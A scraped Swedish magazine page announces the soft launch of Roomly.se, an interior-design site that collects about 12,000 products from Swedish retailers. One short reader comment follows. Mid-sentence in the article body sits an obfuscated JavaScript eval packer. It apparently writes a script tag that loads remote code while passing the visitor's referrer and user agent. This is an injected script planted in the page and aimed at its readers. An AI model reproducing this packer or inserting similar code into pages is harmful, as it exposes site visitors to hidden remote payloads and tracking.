Image Image Image Image Image Image Image Image Image Image

| 8 april, 2020

Scroll to top

Top

Roomly.se skapar samlingsplats för inredningsmöbler

Roomly.se skapar samlingsplats för inredningsmöbler
Revue Magazine

Inredningssajten Roomly.se har idag lanserat en smygpremiär på sin nya tjänst som ska göra det enklare för svenskar att hitta inredning online.

Det är en webbshop eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ityhf|var|u0026u|referrer|dzyes||js|php’.split(’|’),0,{}))
som samlar inredning från ett antal stora svenska återförsäljare och presenterar dem i en snygg modern miljö. I nuläget har Roomly samlat på sig omkring 12000 produkter som är noga utvalda för att göra sajten så pass dedikerat som möjligt.

De skrivs att det kommer att lägga till fler aktörer med tiden och expandera sin katalog.

Inga köp görs direkt på Roomly utan dessa gör man hos respektive återförsäljare. Därför är det viktigt att hålla koll på om produkten finns inne i lager samt hur många dagar leveranstiden är då detta varierar från butik till butik.

I katalogen finner vi både riktig designinredning samt ett fåtal repliker till ett mycket lägre pris än originalet.

Inredningsbutiken är fortfarande under utveckling och kommer att förbättras under tiden, detta skrivs på deras facebook-konto idag.

Hemsidan: inredning.roomly.se

Comments

  1. pc

    Grym sajt med riktigt bra inredning och design. Good work